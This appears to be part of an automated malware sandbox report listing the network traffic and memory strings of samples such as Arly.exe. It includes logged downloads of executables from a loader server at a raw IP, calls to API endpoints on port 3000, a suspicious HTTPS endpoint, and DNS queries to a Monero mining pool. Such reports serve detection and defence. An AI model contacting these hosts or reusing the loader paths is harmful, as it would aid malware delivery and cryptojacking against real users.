                              Source: global trafficHTTP traffic detected: GET /api/solmcrkr0u HTTP/1.1Host: 185.170.153.104:3000Connection: close
                              Source: global trafficHTTP traffic detected: GET /api/solmcrkr0u HTTP/1.1Host: 5.252.153.122:3000Connection: close
                              Source: global trafficHTTP traffic detected: GET /loader/28/file.exe HTTP/1.1Host: 138.124.55.36Connection: close
                              Source: global trafficHTTP traffic detected: GET /loader/1/file1.exe HTTP/1.1Host: 138.124.55.36Connection: close
                              Source: global trafficHTTP traffic detected: GET /loader/1/file2.exe HTTP/1.1Host: 138.124.55.36Connection: close
                              Source: global trafficHTTP traffic detected: GET /loader/1/file3.exe HTTP/1.1Host: 138.124.55.36Connection: close
                              Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                              Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                              Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
                              Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://narwhaljs.org)
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://userguide.icu-project.org/strings/properties
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
                              Source: Arly.exe, 00000000.00000000.1266638136.000000000296D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
                              Source: fontdrvhost.exeString found in binary or memory: https://185.236.26.111:5968/81f60fc7623a81e4/gma2qh9k.o1gwa
                              Source: wxrctnzmvurnezy.exeString found in binary or memory: https://api.ipify.org?format=json
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
                              Source: Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10704
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
                              Source: wxrctnzmvurnezy.exeString found in binary or memory: https://cdn.ipwhois.io/flags/.svg
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/v8/7848
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7231#section-6.4
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7238
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WICG/scheduling-apis
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/issues/575
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/antirez/linenoise
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chalk/supports-color
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/heycam/webidl/pull/946.
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/isaacs/color-support.
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/joyent/node/issues/3295.
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/1501.
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream
                              Source: Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/pump
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mysticatea/abort-controller
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/10673
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/13435
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/19009
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2006
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2119
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/31074
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/3392
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/34532
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35475
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35862
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35981
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39707
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39758
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12342
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12607
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/21313
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/26334.
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30958
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/32887
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33515.
                              Source: Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33661
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/3394
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34010
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34375
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34385
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35941
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38248
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38614)
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-weakrefs
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#Replaceable
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-operations
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64-decode
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
                              Source: wxrctnzmvurnezy.exeString found in binary or memory: https://ipwhois.app/json/
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://jimmy.warting.se/opensource
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://no-color.org/
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
